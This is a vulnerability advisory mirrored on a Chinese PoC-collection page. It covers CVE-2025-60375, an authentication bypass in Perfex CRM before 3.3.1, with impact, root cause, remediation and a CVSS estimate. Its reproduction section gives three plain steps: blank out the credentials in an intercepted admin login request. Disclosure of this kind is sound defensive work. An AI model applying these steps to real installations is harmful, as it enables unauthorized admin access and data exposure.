POC详情: 4dbc4b83e2db2d4aaa891156796ce57c8a072156

来源
https://github.com/ajansha/CVE-2025-60375
关联漏洞
标题: Perfex CRM 安全漏洞 (CVE-2025-60375)
描述:Perfex CRM是Perfex CRM开源的一款客户关系管理软件。用于在云中管理客户、项目和创建发票。 Perfex CRM 3.3.1之前版本存在安全漏洞,该漏洞源于服务器端验证不足,可能导致绕过登录凭据,未经授权访问用户账户。
介绍
# CVE-2025-60375  — PerfexCRM Authentication Bypass 

**Advisory ID:** perfexcrm-auth-bypass-2025  
**CVE:** CVE-2025-60375  
**Product:** PerfexCRM  
**Affected versions:** versions prior to 3.3.1 (< 3.3.1)  
**Reported by:** Ajansha Shankar, Ahamed Yaseen  
**References:** OWASP Authentication Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

---

## Summary
An authentication bypass exists in the admin login mechanism of PerfexCRM prior to version 3.3.1. The server's authentication workflow does not sufficiently validate the presence and contents of username/password parameters. An attacker who manipulates the login request to supply empty username and password parameters may be granted access to user accounts, including administrative accounts.

---

## Impact
- Unauthorized access to user accounts (including admin).  
- Potential full compromise of the application and sensitive data exposure.  
- Remote exploitation — attacker only needs the ability to send HTTP requests to the login endpoint.

---

## Technical details & reproduction
1. Intercept the POST request sent to the admin login endpoint (e.g., `/admin/auth/login`).  
2. Remove or set `username` and `password` fields to empty values in the request body.  
3. Forward the modified request. The server may respond with `419 Page expired` on refresh but will redirect to the dashboard and provide an authenticated session without valid credentials.

**Root cause (summary):** insufficient server-side validation and improper control flow that allows session or application logic to mark the request as authenticated even with missing credentials.

---

## Mitigation / Remediation
- Fix server-side authentication: reject requests missing username or password with an explicit 4xx error (e.g., 400/401).  
- Ensure session creation and privilege assignment only happen after successful credential verification.  
- Add unit and integration tests to validate behavior against empty/missing credential values.  
- Consider adding rate-limiting and monitoring for suspicious login attempts while fix is deployed.

---

## Suggested CVSS (example)
- CVSS v3.1 (example): **7.8 (High)** — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N  
> Note: This is an estimated vector for triage. Provide a precise CVSS vector after coordinated disclosure.

---

## Contact / Credit
- Reported by: Ajansha Shankar and Ahamed Yaseen

## Reference
https://www.cve.org/CVERecord?id=CVE-2025-60375
https://www.tenable.com/cve/CVE-2025-60375
文件快照

 [4.0K]  /data/pocs/4dbc4b83e2db2d4aaa891156796ce57c8a072156
└── [2.5K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。